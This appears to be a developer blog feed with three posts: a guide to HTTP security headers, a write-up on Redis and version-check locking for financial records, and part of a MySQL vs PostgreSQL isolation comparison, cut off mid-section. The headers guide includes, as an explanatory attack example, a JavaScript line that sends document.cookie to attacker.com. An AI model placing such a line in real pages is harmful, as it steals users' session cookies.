DEV Community: Harry Do

HTTP Security Headers

Harry Do — Mon, 27 Oct 2025 05:53:43 +0000

In today's digital landscape, web application security is not optional—it's essential. As cyber threats continue to evolve and become more sophisticated, developers must employ multiple layers of defense to protect their applications and users. One of the most effective yet often overlooked security mechanisms is HTTP security headers.

I. What Are HTTP Security Headers?

HTTP security headers are special response headers that web servers send to browsers, instructing them on how to behave when handling web content. Think of them as security directives that create an additional defensive layer by controlling how browsers process and display your web pages.

Quick Reference: For the complete specification, check out the OWASP HTTP Headers Cheat Sheet

II. Why Security Headers Matter

Modern web applications face an ever-growing list of security threats. Without proper defenses, your application could be vulnerable to:

Cross-Site Scripting (XSS): Malicious scripts injected into your web pages
Clickjacking: Attackers tricking users into clicking hidden elements
Man-in-the-Middle (MITM) attacks: Intercepting and modifying communications
Data injection: Unauthorized data being inserted into web pages
Protocol downgrade attacks: Forcing less secure communication protocols

Security headers provide crucial protection by:

Controlling how browsers behave when rendering your content
Enforcing secure communication protocols
Preventing unauthorized content execution
Protecting against various attack vectors
Adding defense-in-depth to your security strategy

Test Your Site's Security Headers

Want to see how your site scores? Head over to securityheaders.com to scan your website's security headers. You might be surprised at what's missing!

III. Understanding Security Header Categories

Not all security headers are created equal. Let's break them down by how commonly they're implemented and how complex they are to configure.

The Essential Headers (You Should Have These)

Header	Purpose	Security Level
Strict-Transport-Security (HSTS)	Enforces HTTPS connections	High
X-Content-Type-Options	Prevents MIME type sniffing	Medium
Referrer-Policy	Controls referrer information sharing	Low

The Recommended Headers (Most Sites Use These)

Header	Purpose	Security Level
X-Frame-Options	Prevents clickjacking attacks	Medium
Permissions-Policy	Controls browser features and APIs	Medium
Cross-Origin-Opener-Policy (COOP)	Controls cross-origin window access	High
Cross-Origin-Embedder-Policy (COEP)	Controls cross-origin resource loading	High

The Advanced Headers (Complex But Powerful)

Header	Purpose	Security Level
Content-Security-Policy (CSP)	Controls which resources can be loaded and executed	High
Cross-Origin-Resource-Policy (CORP)	Controls cross-origin resource access	Medium

The Legacy Headers (Avoid These)

Header	Purpose	Security Level
X-XSS-Protection	Enables browser XSS filtering (deprecated)	Low

IV. Deep Dive: Configuring Each Header

1. Strict-Transport-Security (HSTS)

What Problem Does It Solve?

HSTS protects against several critical vulnerabilities:

Protocol Downgrade Attacks: Prevents attackers from forcing connections to use HTTP instead of HTTPS
Man-in-the-Middle (MITM): Stops intercepting and modifying HTTPS traffic
Cookie Hijacking: Protects session cookies from being stolen over unencrypted connections

How It Works

HSTS instructs browsers to always use HTTPS when communicating with your server. Once a browser receives this header, it will automatically upgrade all HTTP requests to HTTPS.

Configuration Example

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

Key Directives:

max-age: Duration (in seconds) to enforce HTTPS. 31536000 equals one year.
includeSubDomains: Applies the policy to all subdomains
preload: Indicates your site should be included in browser HSTS preload lists

Common Pitfalls

First Visit Vulnerability: The initial HTTP visit is still vulnerable before the header is received
Subdomain Issues: Misconfigured subdomains can break when includeSubDomains is set
Certificate Problems: Invalid certificates can completely lock users out
Preload List: Once added, it's difficult to remove your site from browser preload lists

2. X-Content-Type-Options

What Problem Does It Solve?

MIME Sniffing Attacks: Prevents browsers from interpreting files as different types than intended
Script Execution: Stops execution of scripts disguised as images or other content types
Content Injection: Blocks malicious content from being processed incorrectly

Understanding MIME Sniffing Attacks

Browsers have a feature called "MIME sniffing" where they examine the actual content of a file to determine its type, rather than trusting the Content-Type header sent by the server. This can be exploited by attackers.

Example Attack Scenario:

An attacker uploads a malicious file disguised as an image:

<!-- Looks innocent enough -->
<img src="https://example.com/uploads/user-avatar.jpg" alt="Profile Picture">

The file user-avatar.jpg might actually contain JavaScript code:

// This is malicious JavaScript disguised as an image
alert('XSS Attack!');
document.location = 'http://attacker.com/steal-data?cookie=' + document.cookie;

Without X-Content-Type-Options: nosniff, the browser might:

See the file extension .jpg and Content-Type: image/jpeg header
Examine the actual content and find JavaScript
Decide "this looks like JavaScript" and execute it
Run the malicious script, potentially stealing cookies or performing other attacks

How X-Content-Type-Options: nosniff Solves It

When you set this header, you're telling the browser:

Trust the Content-Type header - Don't try to guess the file type
Don't MIME sniff - If the server says it's an image, treat it as an image
Prevent content-type confusion - Don't execute scripts that are declared as images

Configuration Example

X-Content-Type-Options: nosniff

Important Note: The nosniff directive specifically applies to script and style request destinations. It blocks requests when the destination is script and the MIME type is not a JavaScript type, or when the destination is style and the MIME type is not text/css. While this provides critical protection for the most common XSS vectors, it doesn't prevent MIME sniffing for all content types.

Common Pitfalls

Legacy content may rely on MIME sniffing
File uploads with incorrect MIME types may not display properly
Browser compatibility is generally good but varies

3. Referrer-Policy

What Problem Does It Solve?

Information Leakage: Prevents sensitive URLs from being exposed in referrer headers
Privacy Violations: Stops tracking users across sites
Data Exposure: Protects sensitive parameters in referrer URLs

Understanding Data Exposure Through Referrers

Many applications pass sensitive data through URL parameters, which gets exposed via referrer headers when users navigate to other sites.

Common Sensitive Data in URLs:

<!-- User profiles -->
https://profile.com/user/12345?name=John+Doe&email=john@example.com&phone=555-1234

<!-- Medical records -->
https://clinic.com/patient/789?diagnosis=diabetes&medication=insulin&age=45

<!-- Financial data -->
https://bank.com/account?balance=100000&credit_score=750&ssn=123-45-6789

How It Works

The Referrer-Policy header controls what information is included in the Referer header when navigating away from your site.

Available Policy Options:

no-referrer: Never send referrer information
no-referrer-when-downgrade: Send referrer only for same-origin or HTTPS→HTTPS
origin: Send only the origin (domain), not the full URL
origin-when-cross-origin: Send full URL for same-origin, only origin for cross-origin
same-origin: Send referrer only for same-origin requests
strict-origin: Send origin for same-origin and HTTPS→HTTPS
strict-origin-when-cross-origin: Send full URL for same-origin, origin for HTTPS→HTTPS, nothing for HTTP (recommended, this is the default in modern browsers)
unsafe-url: Always send full referrer (not recommended)

Configuration Example

Referrer-Policy: strict-origin-when-cross-origin

Note: strict-origin-when-cross-origin is the default policy in modern browsers if no Referrer-Policy header is specified. Setting it explicitly ensures consistent behavior across all browsers and makes your security policy clear.

Common Pitfalls

Analytics tracking may be affected by restrictive policies
Legacy systems may depend on referrer information
Debugging becomes more difficult without full referrer data
Browser support varies for different policies

4. X-Frame-Options

Security Risk Scenario

Clickjacking: Malicious sites embedding your content in invisible frames
UI Redressing: Tricking users into performing unintended actions
Social Engineering: Overlaying malicious content on legitimate pages

How It Solves It

Controls whether browsers can display the page in a frame:

DENY: Completely prevents framing
SAMEORIGIN: Allows framing only from same origin
ALLOW-FROM uri: Allows framing from specific URI (deprecated)

Detailed Information

X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
X-Frame-Options: ALLOW-FROM <https://trusted-site.com>

5. Permissions-Policy

Security Risk Scenario

Feature Abuse: Unauthorized use of browser APIs
Privacy Violations: Access to sensitive device features
Resource Consumption: Excessive use of device resources

How It Solves It

Controls which browser features and APIs can be used:

camera: Camera access
microphone: Microphone access
geolocation: Location access
payment: Payment Request API
usb: USB device access
magnetometer: Magnetometer access
gyroscope: Gyroscope access
accelerometer: Accelerometer access

Detailed Information

Permissions-Policy: camera=(), microphone=(), geolocation=(self), payment=(self "https://trusted-payment.com")

Common Issues

Feature detection may not work as expected
Third-party widgets may break
Progressive enhancement requires careful handling
Browser support is still evolving

6. Content-Security-Policy (CSP)

Security Risk Scenario

XSS Attacks: Malicious scripts injected through user input, third-party libraries, or compromised dependencies
Data Exfiltration: Unauthorized scripts sending sensitive data to external domains
Malicious Redirects: Scripts redirecting users to phishing sites

How CSP Solves It

CSP acts as a whitelist mechanism that:

Restricts which domains can load scripts, styles, images, and other resources
Prevents inline script execution (unless explicitly allowed)
Blocks unauthorized resource loading
Provides violation reporting for monitoring

Detailed Information

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' <https://trusted-cdn.com>; style-src 'self' 'unsafe-inline'; img-src 'self' data: https:; font-src 'self' <https://fonts.gstatic.com>; connect-src 'self' <https://api.example.com>; frame-ancestors 'none'; base-uri 'self'; form-action 'self';

Directives:

default-src: Fallback for other resource types
script-src: Controls JavaScript execution
style-src: Controls CSS loading
img-src: Controls image loading
font-src: Controls font loading
connect-src: Controls AJAX, WebSocket, and EventSource connections
frame-ancestors: Prevents framing (replaces X-Frame-Options)
base-uri: Restricts base tag URLs
form-action: Restricts form submission URLs

Common Issues

Overly restrictive policies can break legitimate functionality
‘unsafe-inline’ reduces security benefits
Third-party integrations may require extensive allowlisting
Legacy code with inline scripts/styles needs refactoring

7. CSP Report Only

The Content-Security-Policy-Report-Only (CSPRO) header is a “testing mode” version of the Content-Security-Policy (CSP) header.

Content-Security-Policy (CSP): Enforces restrictions (e.g., blocks inline scripts, prevents loading resources from unauthorized domains).
Content-Security-Policy-Report-Only (CSPRO): Does not enforce restrictions but reports violations to a specified endpoint.

How It Works

When the browser encounters something that violates the CSP rules defined in the Content-Security-Policy-Report-Only header:
- The resource is still loaded/executed normally.
- The browser sends a violation report (in JSON format) to the URL specified in the report-to or report-uri directive.
Unlike Content-Security-Policy, it does not block or alter resource loading.

Example

Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' https://cdn.example.com; report-uri /csp-violation-report-endpoint/

Scripts are allowed only from self and cdn.example.com. If a script is loaded from another domain:
- It will still run.
- A violation report will be sent to /csp-violation-report-endpoint/.

Violation Report Format

Modern browsers send reports in JSON. A typical report looks like this:

{
  "csp-report": {
    "document-uri": "https://example.com/index.html",
    "referrer": "https://google.com/",
    "violated-directive": "script-src 'self' https://cdn.example.com",
    "effective-directive": "script-src",
    "original-policy": "default-src 'self'; script-src 'self' https://cdn.example.com; report-uri /csp-violation-report-endpoint/",
    "blocked-uri": "https://evil.com/malware.js",
    "line-number": 42,
    "column-number": 17,
    "source-file": "https://example.com/app.js",
    "status-code": 200
  }
}

8. X-XSS-Protection

Security Risk Scenario

Reflected XSS: Malicious scripts in URL parameters
Stored XSS: Malicious scripts stored in databases
DOM-based XSS: Client-side script injection

How It Solves It

Enables browser’s built-in XSS filtering:

0: Disables XSS filtering
1: Enables XSS filtering
1; mode=block: Enables filtering and blocks page loading if XSS detected
1; report=uri: Enables filtering and reports violations

Detailed Information

X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=/xss-report-endpoint

Common Issues

Deprecated in modern browsers (replaced by CSP)
False positives can break legitimate functionality
Limited effectiveness against sophisticated XSS attacks
CSP is preferred for comprehensive protection

V. Some Common Pitfalls

Overly restrictive CSP breaking functionality
Missing HTTPS for HSTS
Incorrect header syntax causing browser errors
Not testing across different browsers
Ignoring CSP violations in production
Hardcoded policies instead of environment-specific ones
Missing subdomain considerations for HSTS

VI. Best Practices

Start with basic headers and gradually add more restrictive ones
Test thoroughly after each change
Monitor CSP violations using reporting endpoints
Keep policies updated as your application evolves
Use reporting-only mode initially for CSP
Document your policies for team reference
Regular security audits to ensure effectiveness

How We Handle Concurrency Control in Financial Systems

Harry Do — Sat, 25 Oct 2025 08:42:02 +0000

The Problem: When Data Integrity Breaks Down

It's the end of a busy financial period. Two team members are working on the same critical financial record—one is finalizing it, the other just discovered an error and is making corrections.

Both click "Save" at nearly the same time. The system accepts both changes.

Later, during a review, someone notices the data doesn't look right. It's neither what the first person entered nor what the second person corrected—it's a corrupted mix of both. Worse, the audit trail is incomplete. No one can tell what happened or when.

This is the nightmare scenario that keeps financial system architects awake at night.

Why Financial Systems Are Different

In a social media app, if two users accidentally overwrite each other's comments, it's annoying. In a financial system, data integrity isn't just important—it's legally mandated.

When you're dealing with money, regulatory compliance, and financial reporting that could affect shareholder decisions or SEC filings, you can't have:

Lost Updates: One person's approved transaction being silently overwritten by another's edit
Inconsistent State: A transaction being approved for financial reporting while someone else is still modifying it
Audit Trail Gaps: Missing records of who changed what and when—a regulatory compliance nightmare
Compliance Violations: Inaccurate financial reports that could trigger investigations, fines, or worse
Cascading Errors: Wrong figures feeding into quarterly reports, tax calculations, and investor statements

In financial systems, every cent must be accounted for, every change must be tracked, and data integrity is non-negotiable.

Our Mission: Protecting Financial Data Integrity

After witnessing the chaos that uncontrolled concurrent access can cause, we set out to build a system with one core principle: First come, first served—and everyone else gets told exactly what's happening.

Our philosophy is simple:

Priority to Speed: The first user to start an operation gets to complete it
No Silent Overwrites: If a second user tries to update based on outdated data, we reject the operation with a clear error message—forcing them to refresh, review the latest changes, and then make their update based on current data
Clarity for Others: Anyone who tries to modify the same data gets a clear, actionable error message
Zero Tolerance for Data Loss: We'd rather block an operation than risk corrupting financial records

Three War Stories: When Concurrency Goes Wrong

Story #1: The Race Condition

Two team members receive an alert about an error in a financial record. They both open it simultaneously and start making corrections.

User A saves their changes. A few seconds later, User B saves.

What should happen?

User A's save goes through. User B gets a clear message: "This record was modified by another user while you were editing. Please refresh and try again."

User B refreshes, sees the fix is already done, and continues their work.

What could go wrong without protection?

Without concurrency control, both saves might succeed. The final data could be a mix of both changes, or worse—one person's entire update could be silently overwritten, causing data loss in financial records.

Story #2: The Moving Target

A supervisor is reviewing a financial record for approval. The data looks good, so they click "Approve."

But there's a problem: while the supervisor had the approval screen open, another user discovered an error and was actively updating that same record.

What should happen?

The system blocks the approval attempt with a message: "This record is currently being modified by another user. Please wait and try again."

Why this matters in financial systems:

The supervisor was about to approve data that was actively being changed. In financial systems, approving a record locks it for regulatory reporting. If they approved incomplete or incorrect data, it could cascade into financial statements, tax calculations, and compliance reports—creating serious regulatory risks.

Story #3: The Time Traveler's Mistake

An approver opens a financial record to review it. They get interrupted by a meeting, leaving their browser tab open for 30 minutes.

While they're away, another user discovers an error and updates the record with corrected values.

The approver returns and, without refreshing, clicks "Approve"—still looking at the old data on their screen.

What should happen?

The system detects they're trying to approve an outdated version. They get a message: "This record has been modified since you opened it. Please refresh to see the latest version before approving."

The financial compliance angle:

The approver made a decision based on stale data. In financial systems, approvers must see current, accurate data before making decisions. Approving outdated data isn't just a technical bug—it's a control failure that auditors flag during compliance reviews.

The Solution: Two Locks for Two Problems

Looking at our three stories, we noticed something interesting: they represent two fundamentally different concurrency problems.

Stories #1 and #2 are about concurrent operations—multiple people trying to modify or approve the same record at the same time. We need to prevent them from stepping on each other's toes.

Story #3 is about version conflicts—someone making decisions based on outdated data. We need to detect when data has changed since they last looked at it.

Different problems require different solutions:

Problem Type	Solution	Which Stories
Concurrent Operations	Pessimistic Locking (Redis)	#1, #2
Version Conflicts	Optimistic Locking	#3

Solution #1: Pessimistic Locking (For Concurrent Operations)

The Challenge

When Emma and James both try to edit Transaction #A2547, or when Lisa tries to approve while Michael is editing, we need to physically prevent them from accessing the same record at the same time. One person gets the lock, everyone else waits.

Think of it like a bathroom door lock—only one person at a time, and everyone else can see it's occupied.

Two Ways to Lock: Database vs Redis

We considered two approaches:

Option 1: Redis Distributed Locks

Before any user touches a record, we check Redis: "Is anyone else working on this record?" If yes, they wait. If no, we create a lock entry in Redis indicating someone is editing it.

Advantages:

Works across multiple servers
Supports batch approval jobs that run for 15+ minutes
Locks automatically expire if something crashes
Doesn't tie up database connections

Downsides:

We need to run Redis (one more thing to maintain)
We have to handle lock logic carefully in code

Option 2: Database Row Locks (SELECT FOR UPDATE)

Use the database's built-in locking with SELECT FOR UPDATE. When a user queries a record for editing, the database locks that row until they're done.

Advantages:

No extra infrastructure needed
Automatic cleanup when transaction commits
Database handles deadlocks automatically

Downsides:

Keeps database connections busy during long operations
Doesn't work for async batch jobs (can't hold a lock across job queues)
Under heavy load, we could run out of database connections

Why We Chose Redis

We went with Redis for one critical reason: batch operations.

Financial systems often need to process hundreds or thousands of records at once (like batch approvals). These operations run as background jobs that might take 15-30 minutes. Database locks can't survive across job queue boundaries—the HTTP request ends, the database transaction commits, and the lock is gone before the background job even starts.

With Redis, we can:

Acquire the lock when the user initiates a batch operation
Store the lock token in the database
Pass it to the background job via message queue
Have the job release the lock when done

Plus, for financial systems, we'd rather sacrifice a bit of infrastructure complexity than risk exhausting our database connection pool during critical processing periods.

Solution #2: Optimistic Locking (For Version Conflicts)

The Problem with Stale Data

Remember Story #3? An approver opened a record, got interrupted, and came back 30 minutes later to approve it—not knowing another user had updated it in the meantime.

We can't lock the record for 30 minutes while someone is away. That would block everyone else from working on it. Instead, we use "optimistic locking"—we assume conflicts are rare, but we verify the data hasn't changed before committing.

How We Detect Version Changes

We track versions two different ways, depending on how the database table works:

Strategy 1: ID-Based Versioning (For Audit Tables)

Some financial tables never delete or overwrite data—for audit compliance. Every edit creates a new record with a new ID, and we mark the old one as deleted.

When someone tries to approve:

Their browser sends: "I want to approve record ID abc123"
Backend checks: "What's the current active record?"
If the current record has a different ID (someone created a new version), we reject the approval
They get told: "This has been modified. Please review the latest version."

Strategy 2: Timestamp-Based Versioning (For Regular Tables)

For tables that update in place, we use the updated_at timestamp as a version number.

When someone tries to approve:

Their browser sends: "I want to approve, and I'm looking at the version from [timestamp]"
Backend checks the current updated_at timestamp
If timestamps don't match → reject the approval
They refresh and see the latest data

How Both Locks Work Together

The two mechanisms form a complete defense system. Every operation goes through both checks:

┌────────���────────────────────────────────────────────────────┐
│                      User Request                            │
│                 (Edit/Approve Record)                        │
└────────────────────────┬────────────────────────────────────┘
                         │
                         ▼
              ┌──────────────────────┐
              │  Pessimistic Lock    │
              │  (Redis Lock Check)  │
              └──────────┬───────────┘
                         │
                    Lock Acquired?
                    │         │
                   Yes        No
                    │         │
                    │         └──► Return Error:
                    │              "Record is being modified"
                    │
                    ▼
              ┌──────────────────────┐
              │  Optimistic Lock     │
              │  (Version Check)     │
              └──────────┬───────────┘
                         │
                   Version Match?
                    │         │
                   Yes        No
                    │         │
                    │         └──► Release Lock
                    │              Return Error:
                    │              "Version conflict detected"
                    │
                    ▼
              ┌──────────────────────┐
              │  Perform Operation   │
              │  (Update/Approve)    │
              └──────────┬───────────┘
                         │
                         ▼
              ┌──────────────────────┐
              │   Release Lock       │
              └──────────────────────┘

Step 1: Pessimistic Lock catches concurrent operations happening right now.

Step 2: Optimistic Lock catches changes that happened earlier while the user was away.

Together, they ensure financial data integrity from every angle.

Implementation Details: How We Built It

This section walks through the actual implementation of our Redis-based locking system.

Choosing the Right Redis Library

We had two options for Redis locking in Go:

bsm/redislock - Simple, works great with a single Redis master
go-redsync/redsync - Implements Redlock algorithm for multi-master Redis clusters

We chose bsm/redislock because our Redis deployment is single-master. For multi-master setups, you'd want go-redsync to handle the distributed consensus problem.

How the Lock System Works

Every lock in Redis follows a simple pattern:

Lock Key Format: lock_event_{resource}_{entity_id}

For example: lock_event_transaction_A2547 when Emma is editing Transaction #A2547.

Lock Lifetime (TTL):

Quick edits: 10 seconds
Data imports: 30 seconds
Batch approvals: 15 minutes

Retry Strategy: If the lock is busy, we retry 3 times with exponential backoff (50ms, 100ms, 200ms). After that, we tell the user someone else is working on it.

Lock Metadata: We store what operation is holding the lock (create/update/delete/approve). This lets us give users helpful error messages like "This record is being approved" instead of generic "Resource locked" errors.

How Locks Work in Practice

When a user tries to edit a financial record, here's what happens:

System generates a lock key based on the record identifier
Check Redis: Is this locked? If yes, what operation is holding it?
If available, create the lock with a unique token and store what operation is happening
Set TTL so it auto-expires (prevents orphaned locks if something crashes)

The lock stored in Redis contains:

A unique key identifying the specific record
A random token proving ownership
Metadata about the operation type (edit/approve/delete)

The token ensures only the lock owner can release it. The operation metadata helps show helpful error messages ("Record is being edited" instead of generic "Resource locked").

Two Ways to Release Locks

Pattern 1: Auto-Release (For Quick Operations)

For normal edits that finish in a few seconds:

Acquire the lock
Do the update
Automatically release when done (even if something crashes). We are using Golang, so putting the lock release in a defer function would be efficient.
TTL: 10-30 seconds

Examples: Editing a field, updating an amount, creating a new record

Pattern 2: Manual Release (For Background Jobs)

For batch operations that take 15+ minutes:

The Problem: When a user initiates a large batch operation, the web request returns immediately, but the actual processing happens in a background job. If we auto-release the lock when the web request finishes, the lock is gone before the job even starts.

The Solution:

Web request acquires the lock
Store the lock token in the database
Pass the token to the background job via message queue
Background job releases the lock when it finishes

This way, the lock survives across the process boundary. If the job crashes, the lock expires after 15 minutes (TTL).

Safe Lock Release with Lua Script:

The manual release uses a Lua script to safely release locks. According to Redis distributed locks documentation, this is the correct way to avoid accidentally releasing another client's lock:

if redis.call("get",KEYS[1]) == ARGV[1] then
    return redis.call("del",KEYS[1])
else
    return 0
end

This script ensures we only delete the lock if the token matches—preventing us from accidentally releasing a lock that belongs to another process.

When locks get released:

Job completes successfully → Released immediately
Job fails after max retries → Released (can retry later with fresh lock)
System crashes → Redis auto-expires after TTL

Lessons Learned: Building Concurrency Control for Financial Systems

When to Use Which Lock

Use Pessimistic Locking (Redis) when:

Multiple users are actively editing the same records right now
You need to block concurrent operations completely
Operations might take a while or run in background jobs
You need locks to survive across different servers/processes

Use Optimistic Locking (Version Check) when:

You want to detect if data changed while user was away
Conflicts are rare and you don't want to block everyone
Operations are quick and you just need to verify data freshness at commit time
You want defense-in-depth alongside pessimistic locks

What We Got Right

TTL on everything - No orphaned locks if something crashes
Exponential backoff retries - Give legitimate operations a chance to finish
Operation metadata in locks - Users get helpful error messages
Two-phase approach - Pessimistic + Optimistic catches all scenarios
Lock monitoring - Track acquisition times, contention rates, timeouts
Graceful Redis failures - Circuit breakers prevent cascading failures

The Trade-offs We Made

Performance vs Safety: Yes, locking adds latency. But in financial systems, correctness matters more than speed. We'd rather users wait a fraction of a second than risk data corruption.

Complexity vs Reliability: Redis adds infrastructure to maintain. But it's worth it to avoid database connection exhaustion and support async workflows.

Fine-grained locks: We lock individual records, not entire tables. This reduces contention but requires careful key design.

Final Thoughts

In financial systems, data integrity isn't optional. Every record must be accurate, every change must be tracked, and every concurrent access must be controlled.

The two-lock approach—pessimistic for real-time conflicts, optimistic for stale data—gives us defense in depth. And by choosing Redis over database locks, we can support the long-running batch operations that financial workflows require.

Is it more complex than no locking? Absolutely. Is it worth it? When dealing with financial data, regulatory compliance, and audit trails, the answer is always yes.

Part 4: MySQL vs PostgreSQL - Transaction Processing and ACID Compliance

Harry Do — Sun, 19 Oct 2025 06:25:02 +0000

1. Overview: Key Architectural Differences
2. Isolation Levels and Concurrency Control
3. MVCC and Transaction Isolation
4. SERIALIZABLE Isolation: Pessimistic vs Optimistic Strategies

Transaction processing reveals fundamental architectural differences between MySQL and PostgreSQL. MySQL prioritizes performance and predictability through pessimistic locking. PostgreSQL prioritizes consistency and concurrency through optimistic conflict detection. Understanding these differences will help you write better applications and avoid subtle data integrity issues.

1. Overview: Key Architectural Differences

This section provides a high-level comparison of how MySQL and PostgreSQL handle transactions. We'll cover three fundamental areas where they differ: ACID compliance, default isolation levels, and MVCC implementation.

Core Architecture Comparison

Aspect	MySQL 8.4	PostgreSQL 17
ACID Compliance	Engine-dependent - InnoDB provides full ACID, MyISAM does not	Built-in - ACID compliance is part of core architecture
Default Isolation Level	REPEATABLE READ - Stricter by default	READ COMMITTED - More concurrent by default
MVCC Implementation	Undo log - Automatic cleanup, zero maintenance	Tuple versioning - Requires VACUUM maintenance
Phantom Read Prevention	Gap locking (at REPEATABLE READ)	Snapshot isolation (at REPEATABLE READ)

What Each Difference Means

ACID Compliance:
MySQL's ACID support depends on which storage engine you use. InnoDB (the default) provides full ACID compliance, but MyISAM does not. PostgreSQL has ACID compliance built into its core architecture—every storage mechanism supports it.

Default Isolation Levels:
MySQL defaults to REPEATABLE READ, providing stronger isolation out of the box. PostgreSQL defaults to READ COMMITTED, favoring higher concurrency. Both prevent phantom reads at REPEATABLE READ level, but through different mechanisms (gap locking vs snapshot isolation).

MVCC Maintenance:
MySQL's undo log approach means old row versions are automatically cleaned up by a background purge thread—zero operational overhead. PostgreSQL's tuple versioning approach stores multiple row versions in the table itself, requiring VACUUM to reclaim space from dead tuples.

2. Isolation Levels and Concurrency Control

💡 Key Insight: Both MySQL and PostgreSQL are overachievers—they prevent phantom reads at REPEATABLE READ even though the SQL standard doesn't require it! 🎓 But here's the plot twist: MySQL is like that friend who locks ALL the doors (gap locking), while PostgreSQL takes a snapshot and says "trust, but verify" (snapshot isolation). Different philosophies, different trade-offs!

2.1 Isolation Levels Comparison

The SQL standard defines four isolation levels, but MySQL and PostgreSQL interpret them quite differently. The key difference? Their default choices reveal their priorities.

Isolation Level	MySQL 8.4 Behavior	PostgreSQL 17 Behavior
READ UNCOMMITTED	Rarely Used - In practice behaves like READ COMMITTED in InnoDB	Not truly supported - Behaves exactly like READ COMMITTED
READ COMMITTED	Available - Allows non-repeatable reads and phantom reads	Default - Allows non-repeatable reads and phantom reads
REPEATABLE READ	Default - Gap locking + MVCC prevents phantoms, allows write-skew	Available - Snapshot isolation prevents phantoms, allows write-skew
SERIALIZABLE	Pessimistic - Converts plain SELECTs to FOR SHARE, prevents conflicts via locking	Optimistic - SSI detects conflicts at commit, can abort transactions

Notice the defaults? MySQL ships with REPEATABLE READ—it's saying "I'll protect you even if it means blocking more." PostgreSQL ships with READ COMMITTED—it's saying "Let's be fast and concurrent; upgrade isolation when you need it."

Here's the fascinating part: Both databases go beyond the SQL standard at REPEATABLE READ by preventing phantom reads (when new rows appear in repeated queries). The standard doesn't require this! But they achieve it in completely opposite ways:

MySQL's approach: Use gap locks to physically block inserts that would create phantoms. It's like putting a "Reserved" sign on every empty seat at a restaurant.
PostgreSQL's approach: Take a snapshot and ignore any new rows added after. It's like taking a photo of the restaurant—even if new people arrive, your photo stays the same.

Critical insight for your app: Neither prevents write-skew at REPEATABLE READ (we'll explain this next). If you need protection against sophisticated anomalies, both databases require SERIALIZABLE—but they implement it VERY differently.

2.2 Write-Skew Anomaly

What is Write-Skew?

Write-skew is the sneakiest of database anomalies—it's like two people independently making perfectly reasonable decisions that somehow create chaos when combined. 🤔

Let me explain with a real-world scenario that'll make this crystal clear.

The Doctor On-Call Scheduling Problem

Picture this: You're running a hospital with one iron-clad rule—at least 2 doctors must be on-call at all times. Right now, Alice, Bob, and Charlie are all on-call, so you're safely above the minimum. 🏥

It's Friday evening, and both Alice and Bob are exhausted. They each want to go off-call, but they're responsible professionals—they'll only leave if there are still enough doctors remaining.

Here's what happens at REPEATABLE READ isolation level:

Timeline:

Time    Transaction 1 (Alice)                    Transaction 2 (Bob)
----    ---------------------------              ---------------------------
T1      BEGIN                                    BEGIN
T2      SELECT COUNT(*) FROM doctors
        WHERE on_call = true;
        → Returns 3 ✅

T3                                               SELECT COUNT(*) FROM doctors
                                                 WHERE on_call = true;
                                                 → Returns 3 ✅

T4      "Great! 3 doctors on-call,
        safe for me to leave."
        UPDATE doctors
        SET on_call = false
        WHERE name = 'Alice';

T5                                               "Great! 3 doctors on-call,
                                                 safe for me to leave."
                                                 UPDATE doctors
                                                 SET on_call = false
                                                 WHERE name = 'Bob';

T6      COMMIT ✅                                COMMIT ✅

The Result: Both transactions succeed! But now only Charlie is on-call. 😱 The "at least 2" constraint is violated!

Why did this happen?

This is write-skew. Here's what makes it so tricky:

Both transactions read the same data (count of on-call doctors = 3)
Both made reasonable decisions based on what they saw
Both updated DIFFERENT rows (Alice's record vs Bob's record)
No direct conflict occurred—traditional locks see no problem!
The constraint was violated because neither transaction saw the other's changes

In database terms: Write-skew occurs when two concurrent transactions read overlapping data sets, make decisions based on what they read, then write to disjoint (non-overlapping) sets of rows in a way that violates an integrity constraint.

Why don't traditional locks catch this?

Because there's no write-write conflict! Alice updates Alice's row. Bob updates Bob's row. Different rows = no lock conflict. The database doesn't know that these two independent updates, when combined, violate a business rule. 🤷‍♂️

It's like two people checking the fridge, seeing 3 beers, each taking one—nobody's stealing the other's beer, but somehow the third roommate ends up with nothing. The reads overlap (both see the same count), but the writes don't (different rows).

The Key Difference:

Aspect	MySQL REPEATABLE READ	PostgreSQL REPEATABLE READ
Write-Skew Protection	❌ Not prevented	❌ Not prevented
Why It Occurs	Gap locks only prevent phantom reads, not cross-row constraint violations	Snapshot Isolation doesn't detect conflicts on different rows
Solution	Must use SERIALIZABLE or explicit locking (`SELECT ... FOR UPDATE`)	Must use SERIALIZABLE (SSI detects and aborts) or explicit locking

Bottom Line: Both databases allow write-skew at REPEATABLE READ. The real difference appears at SERIALIZABLE level—PostgreSQL's SSI can detect and abort write-skew patterns automatically, while MySQL's gap locking only prevents conflicts through blocking, not intelligent detection.

2.3 Gap Locking vs Predicate Locks

Remember how we said both MySQL and PostgreSQL prevent phantom reads at REPEATABLE READ? This is how they do it—and the approaches couldn't be more different. Understanding this difference is crucial because it directly impacts your application's concurrency under load.

The Core Problem: Phantom Reads

Imagine you're counting inventory:

SELECT COUNT(*) FROM products WHERE category = 'Electronics';
-- Returns 100

During your transaction, someone inserts a new product with category = 'Electronics'. If you run the same query again and suddenly get 101, that's a phantom read—a row that "appeared" out of nowhere. 👻

Both databases prevent this at REPEATABLE READ, but with radically different strategies.

MySQL's Gap Locking: The Pessimistic Gatekeeper

MySQL uses gap locks—it literally locks the "gaps" (empty spaces) in the index between existing records. Think of it like reserving not just the occupied tables at a restaurant, but also the empty spaces between them.

How it works:

When you run a query with FOR UPDATE, MySQL doesn't just lock the rows that match—it locks the index ranges those rows occupy, including the gaps. This physically prevents anyone from inserting new rows that would fall into those gaps.

Example: Lock products with IDs between 100-200:

SELECT * FROM products WHERE id BETWEEN 100 AND 200 FOR UPDATE;

MySQL locks:

All existing rows with IDs 100-200 (obviously)
The gap before 100 (e.g., 95-99)
The gap after 200 (e.g., 201-205)
All gaps between existing rows in the range

The catch: Gap locks are range-based, not logic-based. They don't understand your WHERE clause's full meaning—they just lock index ranges. This can block inserts that are logically unrelated to your query.

PostgreSQL's Predicate Locks: The Precision Specialist

PostgreSQL uses predicate locks (also called SIREAD locks)—it remembers the actual predicate (WHERE clause) you used and only blocks operations that would violate that specific predicate.

How it works:

Instead of locking physical gaps in an index, PostgreSQL tracks the logical condition of your query. It says "I'm watching for any inserts that match WHERE category = 'Electronics'"—and only those get blocked.

Example: Lock electronics products:

